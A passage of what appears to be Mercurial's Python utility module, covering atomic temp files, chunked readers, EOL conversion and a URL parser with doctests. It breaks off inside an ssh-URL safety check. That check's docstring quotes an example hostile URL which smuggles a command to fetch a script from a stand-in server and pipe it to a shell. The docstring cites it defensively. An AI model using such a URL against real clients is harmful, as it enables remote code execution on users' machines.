2463 2463 self.write = self._fp.write
2464 2464 self.seek = self._fp.seek
2465 2465 self.tell = self._fp.tell
2466 2466 self.fileno = self._fp.fileno
2467 2467
2468 2468 def close(self):
2469 2469 if not self._fp.closed:
2470 2470 self._fp.close()
2471 2471 filename = localpath(self.__name)
2472 2472 oldstat = self._checkambig and filestat.frompath(filename)
2473 2473 if oldstat and oldstat.stat:
2474 2474 rename(self._tempname, filename)
2475 2475 newstat = filestat.frompath(filename)
2476 2476 if newstat.isambig(oldstat):
2477 2477 # stat of changed file is ambiguous to original one
2478 2478 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2479 2479 os.utime(filename, (advanced, advanced))
2480 2480 else:
2481 2481 rename(self._tempname, filename)
2482 2482
2483 2483 def discard(self):
2484 2484 if not self._fp.closed:
2485 2485 try:
2486 2486 os.unlink(self._tempname)
2487 2487 except OSError:
2488 2488 pass
2489 2489 self._fp.close()
2490 2490
2491 2491 def __del__(self):
2492 2492 if safehasattr(self, '_fp'): # constructor actually did something
2493 2493 self.discard()
2494 2494
2495 2495 def __enter__(self):
2496 2496 return self
2497 2497
2498 2498 def __exit__(self, exctype, excvalue, traceback):
2499 2499 if exctype is not None:
2500 2500 self.discard()
2501 2501 else:
2502 2502 self.close()
2503 2503
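# A typical usage sketch (the file name is hypothetical):
#
#   with atomictempfile(b'somefile', checkambig=True) as f:
#       f.write(b'new contents')
#
# On a clean exit the temporary copy is renamed over b'somefile'; if an
# exception escapes the with block, the copy is discarded and the
# original file is left untouched.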
2504 2504
2505 2505 def unlinkpath(f, ignoremissing=False, rmdir=True):
2506 2506 """unlink and remove the directory if it is empty"""
2507 2507 if ignoremissing:
2508 2508 tryunlink(f)
2509 2509 else:
2510 2510 unlink(f)
2511 2511 if rmdir:
2512 2512 # try removing directories that might now be empty
2513 2513 try:
2514 2514 removedirs(os.path.dirname(f))
2515 2515 except OSError:
2516 2516 pass
2517 2517
2518 2518
2519 2519 def tryunlink(f):
2520 2520 """Attempt to remove a file, ignoring ENOENT errors."""
2521 2521 try:
2522 2522 unlink(f)
2523 2523 except OSError as e:
2524 2524 if e.errno != errno.ENOENT:
2525 2525 raise
2526 2526
2527 2527
2528 2528 def makedirs(name, mode=None, notindexed=False):
2529 2529 """recursive directory creation with parent mode inheritance
2530 2530
2531 2531 Newly created directories are marked as "not to be indexed by
2532 2532 the content indexing service", if ``notindexed`` is specified
2533 2533 for "write" mode access.
2534 2534 """
2535 2535 try:
2536 2536 makedir(name, notindexed)
2537 2537 except OSError as err:
2538 2538 if err.errno == errno.EEXIST:
2539 2539 return
2540 2540 if err.errno != errno.ENOENT or not name:
2541 2541 raise
2542 2542 parent = os.path.dirname(os.path.abspath(name))
2543 2543 if parent == name:
2544 2544 raise
2545 2545 makedirs(parent, mode, notindexed)
2546 2546 try:
2547 2547 makedir(name, notindexed)
2548 2548 except OSError as err:
2549 2549 # Catch EEXIST to handle races
2550 2550 if err.errno == errno.EEXIST:
2551 2551 return
2552 2552 raise
2553 2553 if mode is not None:
2554 2554 os.chmod(name, mode)
2555 2555
2556 2556
2557 2557 def readfile(path):
2558 2558 with open(path, b'rb') as fp:
2559 2559 return fp.read()
2560 2560
2561 2561
2562 2562 def writefile(path, text):
2563 2563 with open(path, b'wb') as fp:
2564 2564 fp.write(text)
2565 2565
2566 2566
2567 2567 def appendfile(path, text):
2568 2568 with open(path, b'ab') as fp:
2569 2569 fp.write(text)
2570 2570
2571 2571
2572 2572 class chunkbuffer(object):
2573 2573 """Allow arbitrary sized chunks of data to be efficiently read from an
2574 2574 iterator over chunks of arbitrary size."""
2575 2575
2576 2576 def __init__(self, in_iter):
2577 2577 """in_iter is the iterator that's iterating over the input chunks."""
2578 2578
2579 2579 def splitbig(chunks):
2580 2580 for chunk in chunks:
2581 2581 if len(chunk) > 2 ** 20:
2582 2582 pos = 0
2583 2583 while pos < len(chunk):
2584 2584 end = pos + 2 ** 18
2585 2585 yield chunk[pos:end]
2586 2586 pos = end
2587 2587 else:
2588 2588 yield chunk
2589 2589
2590 2590 self.iter = splitbig(in_iter)
2591 2591 self._queue = collections.deque()
2592 2592 self._chunkoffset = 0
2593 2593
2594 2594 def read(self, l=None):
2595 2595 """Read L bytes of data from the iterator of chunks of data.
2596 2596 Returns less than L bytes if the iterator runs dry.
2597 2597
2598 2598 If size parameter is omitted, read everything"""
2599 2599 if l is None:
2600 2600 return b''.join(self.iter)
2601 2601
2602 2602 left = l
2603 2603 buf = []
2604 2604 queue = self._queue
2605 2605 while left > 0:
2606 2606 # refill the queue
2607 2607 if not queue:
2608 2608 target = 2 ** 18
2609 2609 for chunk in self.iter:
2610 2610 queue.append(chunk)
2611 2611 target -= len(chunk)
2612 2612 if target <= 0:
2613 2613 break
2614 2614 if not queue:
2615 2615 break
2616 2616
2617 2617 # The easy way to do this would be to queue.popleft(), modify the
2618 2618 # chunk (if necessary), then queue.appendleft(). However, for cases
2619 2619 # where we read partial chunk content, this incurs 2 dequeue
2620 2620 # mutations and creates a new str for the remaining chunk in the
2621 2621 # queue. Our code below avoids this overhead.
2622 2622
2623 2623 chunk = queue[0]
2624 2624 chunkl = len(chunk)
2625 2625 offset = self._chunkoffset
2626 2626
2627 2627 # Use full chunk.
2628 2628 if offset == 0 and left >= chunkl:
2629 2629 left -= chunkl
2630 2630 queue.popleft()
2631 2631 buf.append(chunk)
2632 2632 # self._chunkoffset remains at 0.
2633 2633 continue
2634 2634
2635 2635 chunkremaining = chunkl - offset
2636 2636
2637 2637 # Use all of unconsumed part of chunk.
2638 2638 if left >= chunkremaining:
2639 2639 left -= chunkremaining
2640 2640 queue.popleft()
2641 2641 # offset == 0 is enabled by block above, so this won't merely
2642 2642 # copy via ``chunk[0:]``.
2643 2643 buf.append(chunk[offset:])
2644 2644 self._chunkoffset = 0
2645 2645
2646 2646 # Partial chunk needed.
2647 2647 else:
2648 2648 buf.append(chunk[offset : offset + left])
2649 2649 self._chunkoffset += left
2650 2650 left -= chunkremaining
2651 2651
2652 2652 return b''.join(buf)
2653 2653
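# An illustrative sketch of partial reads across chunk boundaries:
#
#   buf = chunkbuffer(iter([b'abc', b'defg']))
#   buf.read(2)  -> b'ab'    (b'c' stays queued, _chunkoffset == 2)
#   buf.read(4)  -> b'cdef'
#   buf.read(10) -> b'g'     (iterator ran dry; short read)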
2654 2654
2655 2655 def filechunkiter(f, size=131072, limit=None):
2656 2656 """Create a generator that produces the data in the file size
2657 2657 (default 131072) bytes at a time, up to optional limit (default is
2658 2658 to read all data). Chunks may be less than size bytes if the
2659 2659 chunk is the last chunk in the file, or the file is a socket or
2660 2660 some other type of file that sometimes reads less data than is
2661 2661 requested."""
2662 2662 assert size >= 0
2663 2663 assert limit is None or limit >= 0
2664 2664 while True:
2665 2665 if limit is None:
2666 2666 nbytes = size
2667 2667 else:
2668 2668 nbytes = min(limit, size)
2669 2669 s = nbytes and f.read(nbytes)
2670 2670 if not s:
2671 2671 break
2672 2672 if limit:
2673 2673 limit -= len(s)
2674 2674 yield s
2675 2675
2676 2676
2677 2677 class cappedreader(object):
2678 2678 """A file object proxy that allows reading up to N bytes.
2679 2679
2680 2680 Given a source file object, instances of this type allow reading up to
2681 2681 N bytes from that source file object. Attempts to read past the allowed
2682 2682 limit are treated as EOF.
2683 2683
2684 2684 It is assumed that I/O is not performed on the original file object
2685 2685 in addition to I/O that is performed by this instance. If there is,
2686 2686 state tracking will get out of sync and unexpected results will ensue.
2687 2687 """
2688 2688
2689 2689 def __init__(self, fh, limit):
2690 2690 """Allow reading up to <limit> bytes from <fh>."""
2691 2691 self._fh = fh
2692 2692 self._left = limit
2693 2693
2694 2694 def read(self, n=-1):
2695 2695 if not self._left:
2696 2696 return b''
2697 2697
2698 2698 if n < 0:
2699 2699 n = self._left
2700 2700
2701 2701 data = self._fh.read(min(n, self._left))
2702 2702 self._left -= len(data)
2703 2703 assert self._left >= 0
2704 2704
2705 2705 return data
2706 2706
2707 2707 def readinto(self, b):
2708 2708 res = self.read(len(b))
2709 2709 if res is None:
2710 2710 return None
2711 2711
2712 2712 b[0 : len(res)] = res
2713 2713 return len(res)
2714 2714
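# An illustrative sketch using a standard in-memory file object:
#
#   r = cappedreader(io.BytesIO(b'0123456789'), 4)
#   r.read() -> b'0123'   (reads stop at the 4-byte limit)
#   r.read() -> b''       (past the limit behaves like EOF)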
2715 2715
2716 2716 def unitcountfn(*unittable):
2717 2717 '''return a function that renders a readable count of some quantity'''
2718 2718
2719 2719 def go(count):
2720 2720 for multiplier, divisor, format in unittable:
2721 2721 if abs(count) >= divisor * multiplier:
2722 2722 return format % (count / float(divisor))
2723 2723 return unittable[-1][2] % count
2724 2724
2725 2725 return go
2726 2726
2727 2727
2728 2728 def processlinerange(fromline, toline):
2729 2729 """Check that linerange <fromline>:<toline> makes sense and return a
2730 2730 0-based range.
2731 2731
2732 2732 >>> processlinerange(10, 20)
2733 2733 (9, 20)
2734 2734 >>> processlinerange(2, 1)
2735 2735 Traceback (most recent call last):
2736 2736 ...
2737 2737 ParseError: line range must be positive
2738 2738 >>> processlinerange(0, 5)
2739 2739 Traceback (most recent call last):
2740 2740 ...
2741 2741 ParseError: fromline must be strictly positive
2742 2742 """
2743 2743 if toline - fromline < 0:
2744 2744 raise error.ParseError(_(b"line range must be positive"))
2745 2745 if fromline < 1:
2746 2746 raise error.ParseError(_(b"fromline must be strictly positive"))
2747 2747 return fromline - 1, toline
2748 2748
2749 2749
2750 2750 bytecount = unitcountfn(
2751 2751 (100, 1 << 30, _(b'%.0f GB')),
2752 2752 (10, 1 << 30, _(b'%.1f GB')),
2753 2753 (1, 1 << 30, _(b'%.2f GB')),
2754 2754 (100, 1 << 20, _(b'%.0f MB')),
2755 2755 (10, 1 << 20, _(b'%.1f MB')),
2756 2756 (1, 1 << 20, _(b'%.2f MB')),
2757 2757 (100, 1 << 10, _(b'%.0f KB')),
2758 2758 (10, 1 << 10, _(b'%.1f KB')),
2759 2759 (1, 1 << 10, _(b'%.2f KB')),
2760 2760 (1, 1, _(b'%.0f bytes')),
2761 2761 )
2762 2762
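# Illustrative values produced by bytecount:
#
#   bytecount(2048)      -> b'2.00 KB'
#   bytecount(123456789) -> b'118 MB'
#
# The table is scanned top-down, so larger counts get coarser precision
# within each unit.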
2763 2763
2764 2764 class transformingwriter(object):
2765 2765 """Writable file wrapper to transform data by function"""
2766 2766
2767 2767 def __init__(self, fp, encode):
2768 2768 self._fp = fp
2769 2769 self._encode = encode
2770 2770
2771 2771 def close(self):
2772 2772 self._fp.close()
2773 2773
2774 2774 def flush(self):
2775 2775 self._fp.flush()
2776 2776
2777 2777 def write(self, data):
2778 2778 return self._fp.write(self._encode(data))
2779 2779
2780 2780
2781 2781 # Matches a single EOL which can either be a CRLF where repeated CR
2782 2782 # are removed or a LF. We do not care about old Macintosh files, so a
2783 2783 # stray CR is an error.
2784 2784 _eolre = remod.compile(br'\r*\n')
2785 2785
2786 2786
2787 2787 def tolf(s):
2788 2788 return _eolre.sub(b'\n', s)
2789 2789
2790 2790
2791 2791 def tocrlf(s):
2792 2792 return _eolre.sub(b'\r\n', s)
2793 2793
2794 2794
2795 2795 def _crlfwriter(fp):
2796 2796 return transformingwriter(fp, tocrlf)
2797 2797
2798 2798
2799 2799 if pycompat.oslinesep == b'\r\n':
2800 2800 tonativeeol = tocrlf
2801 2801 fromnativeeol = tolf
2802 2802 nativeeolwriter = _crlfwriter
2803 2803 else:
2804 2804 tonativeeol = pycompat.identity
2805 2805 fromnativeeol = pycompat.identity
2806 2806 nativeeolwriter = pycompat.identity
2807 2807
2808 2808 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2809 2809 3,
2810 2810 0,
2811 2811 ):
2812 2812 # There is an issue in CPython that some IO methods do not handle EINTR
2813 2813 # correctly. The following table shows what CPython version (and functions)
2814 2814 # are affected (buggy: has the EINTR bug, okay: otherwise):
2815 2815 #
2816 2816 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2817 2817 # --------------------------------------------------
2818 2818 # fp.__iter__ | buggy | buggy | okay
2819 2819 # fp.read* | buggy | okay [1] | okay
2820 2820 #
2821 2821 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2822 2822 #
2823 2823 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2824 2824 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2825 2825 #
2826 2826 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2827 2827 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2828 2828 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2829 2829 # fp.__iter__ but not other fp.read* methods.
2830 2830 #
2831 2831 # On modern systems like Linux, the "read" syscall cannot be interrupted
2832 2832 # when reading "fast" files like on-disk files. So the EINTR issue only
2833 2833 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2834 2834 # files approximately as "fast" files and use the fast (unsafe) code path,
2835 2835 # to minimize the performance impact.
2836 2836 if sys.version_info >= (2, 7, 4):
2837 2837 # fp.readline deals with EINTR correctly, use it as a workaround.
2838 2838 def _safeiterfile(fp):
2839 2839 return iter(fp.readline, b'')
2840 2840
2841 2841 else:
2842 2842 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2843 2843 # note: this may block longer than necessary because of bufsize.
2844 2844 def _safeiterfile(fp, bufsize=4096):
2845 2845 fd = fp.fileno()
2846 2846 line = b''
2847 2847 while True:
2848 2848 try:
2849 2849 buf = os.read(fd, bufsize)
2850 2850 except OSError as ex:
2851 2851 # os.read only raises EINTR before any data is read
2852 2852 if ex.errno == errno.EINTR:
2853 2853 continue
2854 2854 else:
2855 2855 raise
2856 2856 line += buf
2857 2857 if b'\n' in buf:
2858 2858 splitted = line.splitlines(True)
2859 2859 line = b''
2860 2860 for l in splitted:
2861 2861 if l[-1] == b'\n':
2862 2862 yield l
2863 2863 else:
2864 2864 line = l
2865 2865 if not buf:
2866 2866 break
2867 2867 if line:
2868 2868 yield line
2869 2869
2870 2870 def iterfile(fp):
2871 2871 fastpath = True
2872 2872 if type(fp) is file:
2873 2873 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2874 2874 if fastpath:
2875 2875 return fp
2876 2876 else:
2877 2877 return _safeiterfile(fp)
2878 2878
2879 2879
2880 2880 else:
2881 2881 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2882 2882 def iterfile(fp):
2883 2883 return fp
2884 2884
2885 2885
2886 2886 def iterlines(iterator):
2887 2887 for chunk in iterator:
2888 2888 for line in chunk.splitlines():
2889 2889 yield line
2890 2890
2891 2891
2892 2892 def expandpath(path):
2893 2893 return os.path.expanduser(os.path.expandvars(path))
2894 2894
2895 2895
2896 2896 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2897 2897 """Return the result of interpolating items in the mapping into string s.
2898 2898
2899 2899 prefix is a single character string, or a two character string with
2900 2900 a backslash as the first character if the prefix needs to be escaped in
2901 2901 a regular expression.
2902 2902
2903 2903 fn is an optional function that will be applied to the replacement text
2904 2904 just before replacement.
2905 2905
2906 2906 escape_prefix is an optional flag that allows using doubled prefix for
2907 2907 its escaping.
2908 2908 """
2909 2909 fn = fn or (lambda s: s)
2910 2910 patterns = b'|'.join(mapping.keys())
2911 2911 if escape_prefix:
2912 2912 patterns += b'|' + prefix
2913 2913 if len(prefix) > 1:
2914 2914 prefix_char = prefix[1:]
2915 2915 else:
2916 2916 prefix_char = prefix
2917 2917 mapping[prefix_char] = prefix_char
2918 2918 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2919 2919 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2920 2920
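# An illustrative example:
#
#   interpolate(b'%', {b'foo': b'bar'}, b'say %foo') -> b'say bar'
#
# With escape_prefix=True, a doubled prefix (b'%%') collapses to a
# single literal prefix character in the output.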
2921 2921
2922 2922 def getport(port):
2923 2923 """Return the port for a given network service.
2924 2924
2925 2925 If port is an integer, it's returned as is. If it's a string, it's
2926 2926 looked up using socket.getservbyname(). If there's no matching
2927 2927 service, error.Abort is raised.
2928 2928 """
2929 2929 try:
2930 2930 return int(port)
2931 2931 except ValueError:
2932 2932 pass
2933 2933
2934 2934 try:
2935 2935 return socket.getservbyname(pycompat.sysstr(port))
2936 2936 except socket.error:
2937 2937 raise error.Abort(
2938 2938 _(b"no port number associated with service '%s'") % port
2939 2939 )
2940 2940
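# Illustrative behavior:
#
#   getport(8080)    -> 8080
#   getport(b'80')   -> 80
#   getport(b'http') -> 80 on typical systems (via the services database)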
2941 2941
2942 2942 class url(object):
2943 2943 r"""Reliable URL parser.
2944 2944
2945 2945 This parses URLs and provides attributes for the following
2946 2946 components:
2947 2947
2948 2948 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2949 2949
2950 2950 Missing components are set to None. The only exception is
2951 2951 fragment, which is set to '' if present but empty.
2952 2952
2953 2953 If parsefragment is False, fragment is included in query. If
2954 2954 parsequery is False, query is included in path. If both are
2955 2955 False, both fragment and query are included in path.
2956 2956
2957 2957 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2958 2958
2959 2959 Note that for backward compatibility reasons, bundle URLs do not
2960 2960 take host names. That means 'bundle://../' has a path of '../'.
2961 2961
2962 2962 Examples:
2963 2963
2964 2964 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2965 2965 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2966 2966 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2967 2967 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2968 2968 >>> url(b'file:///home/joe/repo')
2969 2969 <url scheme: 'file', path: '/home/joe/repo'>
2970 2970 >>> url(b'file:///c:/temp/foo/')
2971 2971 <url scheme: 'file', path: 'c:/temp/foo/'>
2972 2972 >>> url(b'bundle:foo')
2973 2973 <url scheme: 'bundle', path: 'foo'>
2974 2974 >>> url(b'bundle://../foo')
2975 2975 <url scheme: 'bundle', path: '../foo'>
2976 2976 >>> url(br'c:\foo\bar')
2977 2977 <url path: 'c:\\foo\\bar'>
2978 2978 >>> url(br'\\blah\blah\blah')
2979 2979 <url path: '\\\\blah\\blah\\blah'>
2980 2980 >>> url(br'\\blah\blah\blah#baz')
2981 2981 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2982 2982 >>> url(br'file:///C:\users\me')
2983 2983 <url scheme: 'file', path: 'C:\\users\\me'>
2984 2984
2985 2985 Authentication credentials:
2986 2986
2987 2987 >>> url(b'ssh://joe:xyz@x/repo')
2988 2988 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2989 2989 >>> url(b'ssh://joe@x/repo')
2990 2990 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2991 2991
2992 2992 Query strings and fragments:
2993 2993
2994 2994 >>> url(b'http://host/a?b#c')
2995 2995 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2996 2996 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2997 2997 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2998 2998
2999 2999 Empty path:
3000 3000
3001 3001 >>> url(b'')
3002 3002 <url path: ''>
3003 3003 >>> url(b'#a')
3004 3004 <url path: '', fragment: 'a'>
3005 3005 >>> url(b'http://host/')
3006 3006 <url scheme: 'http', host: 'host', path: ''>
3007 3007 >>> url(b'http://host/#a')
3008 3008 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3009 3009
3010 3010 Only scheme:
3011 3011
3012 3012 >>> url(b'http:')
3013 3013 <url scheme: 'http'>
3014 3014 """
3015 3015
3016 3016 _safechars = b"!~*'()+"
3017 3017 _safepchars = b"/!~*'()+:\\"
3018 3018 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3019 3019
3020 3020 def __init__(self, path, parsequery=True, parsefragment=True):
3021 3021 # We slowly chomp away at path until we have only the path left
3022 3022 self.scheme = self.user = self.passwd = self.host = None
3023 3023 self.port = self.path = self.query = self.fragment = None
3024 3024 self._localpath = True
3025 3025 self._hostport = b''
3026 3026 self._origpath = path
3027 3027
3028 3028 if parsefragment and b'#' in path:
3029 3029 path, self.fragment = path.split(b'#', 1)
3030 3030
3031 3031 # special case for Windows drive letters and UNC paths
3032 3032 if hasdriveletter(path) or path.startswith(b'\\\\'):
3033 3033 self.path = path
3034 3034 return
3035 3035
3036 3036 # For compatibility reasons, we can't handle bundle paths as
3037 3037 # normal URLS
3038 3038 if path.startswith(b'bundle:'):
3039 3039 self.scheme = b'bundle'
3040 3040 path = path[7:]
3041 3041 if path.startswith(b'//'):
3042 3042 path = path[2:]
3043 3043 self.path = path
3044 3044 return
3045 3045
3046 3046 if self._matchscheme(path):
3047 3047 parts = path.split(b':', 1)
3048 3048 if parts[0]:
3049 3049 self.scheme, path = parts
3050 3050 self._localpath = False
3051 3051
3052 3052 if not path:
3053 3053 path = None
3054 3054 if self._localpath:
3055 3055 self.path = b''
3056 3056 return
3057 3057 else:
3058 3058 if self._localpath:
3059 3059 self.path = path
3060 3060 return
3061 3061
3062 3062 if parsequery and b'?' in path:
3063 3063 path, self.query = path.split(b'?', 1)
3064 3064 if not path:
3065 3065 path = None
3066 3066 if not self.query:
3067 3067 self.query = None
3068 3068
3069 3069 # // is required to specify a host/authority
3070 3070 if path and path.startswith(b'//'):
3071 3071 parts = path[2:].split(b'/', 1)
3072 3072 if len(parts) > 1:
3073 3073 self.host, path = parts
3074 3074 else:
3075 3075 self.host = parts[0]
3076 3076 path = None
3077 3077 if not self.host:
3078 3078 self.host = None
3079 3079 # path of file:///d is /d
3080 3080 # path of file:///d:/ is d:/, not /d:/
3081 3081 if path and not hasdriveletter(path):
3082 3082 path = b'/' + path
3083 3083
3084 3084 if self.host and b'@' in self.host:
3085 3085 self.user, self.host = self.host.rsplit(b'@', 1)
3086 3086 if b':' in self.user:
3087 3087 self.user, self.passwd = self.user.split(b':', 1)
3088 3088 if not self.host:
3089 3089 self.host = None
3090 3090
3091 3091 # Don't split on colons in IPv6 addresses without ports
3092 3092 if (
3093 3093 self.host
3094 3094 and b':' in self.host
3095 3095 and not (
3096 3096 self.host.startswith(b'[') and self.host.endswith(b']')
3097 3097 )
3098 3098 ):
3099 3099 self._hostport = self.host
3100 3100 self.host, self.port = self.host.rsplit(b':', 1)
3101 3101 if not self.host:
3102 3102 self.host = None
3103 3103
3104 3104 if (
3105 3105 self.host
3106 3106 and self.scheme == b'file'
3107 3107 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3108 3108 ):
3109 3109 raise error.Abort(
3110 3110 _(b'file:// URLs can only refer to localhost')
3111 3111 )
3112 3112
3113 3113 self.path = path
3114 3114
3115 3115 # leave the query string escaped
3116 3116 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3117 3117 v = getattr(self, a)
3118 3118 if v is not None:
3119 3119 setattr(self, a, urlreq.unquote(v))
3120 3120
3121 3121 @encoding.strmethod
3122 3122 def __repr__(self):
3123 3123 attrs = []
3124 3124 for a in (
3125 3125 b'scheme',
3126 3126 b'user',
3127 3127 b'passwd',
3128 3128 b'host',
3129 3129 b'port',
3130 3130 b'path',
3131 3131 b'query',
3132 3132 b'fragment',
3133 3133 ):
3134 3134 v = getattr(self, a)
3135 3135 if v is not None:
3136 3136 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3137 3137 return b'<url %s>' % b', '.join(attrs)
3138 3138
3139 3139 def __bytes__(self):
3140 3140 r"""Join the URL's components back into a URL string.
3141 3141
3142 3142 Examples:
3143 3143
3144 3144 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3145 3145 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3146 3146 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3147 3147 'http://user:pw@host:80/?foo=bar&baz=42'
3148 3148 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3149 3149 'http://user:pw@host:80/?foo=bar%3dbaz'
3150 3150 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3151 3151 'ssh://user:pw@[::1]:2200//home/joe#'
3152 3152 >>> bytes(url(b'http://localhost:80//'))
3153 3153 'http://localhost:80//'
3154 3154 >>> bytes(url(b'http://localhost:80/'))
3155 3155 'http://localhost:80/'
3156 3156 >>> bytes(url(b'http://localhost:80'))
3157 3157 'http://localhost:80/'
3158 3158 >>> bytes(url(b'bundle:foo'))
3159 3159 'bundle:foo'
3160 3160 >>> bytes(url(b'bundle://../foo'))
3161 3161 'bundle:../foo'
3162 3162 >>> bytes(url(b'path'))
3163 3163 'path'
3164 3164 >>> bytes(url(b'file:///tmp/foo/bar'))
3165 3165 'file:///tmp/foo/bar'
3166 3166 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3167 3167 'file:///c:/tmp/foo/bar'
3168 3168 >>> print(url(br'bundle:foo\bar'))
3169 3169 bundle:foo\bar
3170 3170 >>> print(url(br'file:///D:\data\hg'))
3171 3171 file:///D:\data\hg
3172 3172 """
3173 3173 if self._localpath:
3174 3174 s = self.path
3175 3175 if self.scheme == b'bundle':
3176 3176 s = b'bundle:' + s
3177 3177 if self.fragment:
3178 3178 s += b'#' + self.fragment
3179 3179 return s
3180 3180
3181 3181 s = self.scheme + b':'
3182 3182 if self.user or self.passwd or self.host:
3183 3183 s += b'//'
3184 3184 elif self.scheme and (
3185 3185 not self.path
3186 3186 or self.path.startswith(b'/')
3187 3187 or hasdriveletter(self.path)
3188 3188 ):
3189 3189 s += b'//'
3190 3190 if hasdriveletter(self.path):
3191 3191 s += b'/'
3192 3192 if self.user:
3193 3193 s += urlreq.quote(self.user, safe=self._safechars)
3194 3194 if self.passwd:
3195 3195 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3196 3196 if self.user or self.passwd:
3197 3197 s += b'@'
3198 3198 if self.host:
3199 3199 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3200 3200 s += urlreq.quote(self.host)
3201 3201 else:
3202 3202 s += self.host
3203 3203 if self.port:
3204 3204 s += b':' + urlreq.quote(self.port)
3205 3205 if self.host:
3206 3206 s += b'/'
3207 3207 if self.path:
3208 3208 # TODO: similar to the query string, we should not unescape the
3209 3209 # path when we store it, the path might contain '%2f' = '/',
3210 3210 # which we should *not* escape.
3211 3211 s += urlreq.quote(self.path, safe=self._safepchars)
3212 3212 if self.query:
3213 3213 # we store the query in escaped form.
3214 3214 s += b'?' + self.query
3215 3215 if self.fragment is not None:
3216 3216 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3217 3217 return s
3218 3218
3219 3219 __str__ = encoding.strmethod(__bytes__)
3220 3220
3221 3221 def authinfo(self):
3222 3222 user, passwd = self.user, self.passwd
3223 3223 try:
3224 3224 self.user, self.passwd = None, None
3225 3225 s = bytes(self)
3226 3226 finally:
3227 3227 self.user, self.passwd = user, passwd
3228 3228 if not self.user:
3229 3229 return (s, None)
3230 3230 # authinfo[1] is passed to urllib2 password manager, and its
3231 3231 # URIs must not contain credentials. The host is passed in the
3232 3232 # URIs list because Python < 2.4.3 uses only that to search for
3233 3233 # a password.
3234 3234 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3235 3235
3236 3236 def isabs(self):
3237 3237 if self.scheme and self.scheme != b'file':
3238 3238 return True # remote URL
3239 3239 if hasdriveletter(self.path):
3240 3240 return True # absolute for our purposes - can't be joined()
3241 3241 if self.path.startswith(br'\\'):
3242 3242 return True # Windows UNC path
3243 3243 if self.path.startswith(b'/'):
3244 3244 return True # POSIX-style
3245 3245 return False
3246 3246
3247 3247 def localpath(self):
3248 3248 if self.scheme == b'file' or self.scheme == b'bundle':
3249 3249 path = self.path or b'/'
3250 3250 # For Windows, we need to promote hosts containing drive
3251 3251 # letters to paths with drive letters.
3252 3252 if hasdriveletter(self._hostport):
3253 3253 path = self._hostport + b'/' + self.path
3254 3254 elif (
3255 3255 self.host is not None and self.path and not hasdriveletter(path)
3256 3256 ):
3257 3257 path = b'/' + path
3258 3258 return path
3259 3259 return self._origpath
3260 3260
3261 3261 def islocal(self):
3262 3262 '''whether localpath will return something that posixfile can open'''
3263 3263 return (
3264 3264 not self.scheme
3265 3265 or self.scheme == b'file'
3266 3266 or self.scheme == b'bundle'
3267 3267 )
3268 3268
3269 3269
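# A minimal sketch of authinfo(), which re-serializes the URL without
# credentials and returns them separately for a urllib2-style password
# manager; the host and account below are hypothetical.
from mercurial import util

u = util.url(b'http://joe:secret@example.com/repo')
uri, auth = u.authinfo()
assert uri == b'http://example.com/repo'          # credentials stripped
assert auth == (None, (uri, b'example.com'), b'joe', b'secret')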
3270 3270 def hasscheme(path):
3271 3271 return bool(url(path).scheme)
3272 3272
3273 3273
3274 3274 def hasdriveletter(path):
3275 3275 return path and path[1:2] == b':' and path[0:1].isalpha()
3276 3276
3277 3277
3278 3278 def urllocalpath(path):
3279 3279 return url(path, parsequery=False, parsefragment=False).localpath()
3280 3280
3281 3281
3282 3282 def checksafessh(path):
3283 3283 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3284 3284
3285 3285 This is a sanity check for ssh urls. ssh will parse the first item as
3286 3286 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3287 3287 Let's prevent these potentially exploitable urls entirely and warn the
3288 3288 user.
3289 3289
3290 3290 Raises an error.Abort when the url is unsafe.
3291 3291 """
3292 3292 path = urlreq.unquote(path)
3293 3293 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3294 3294 raise error.Abort(
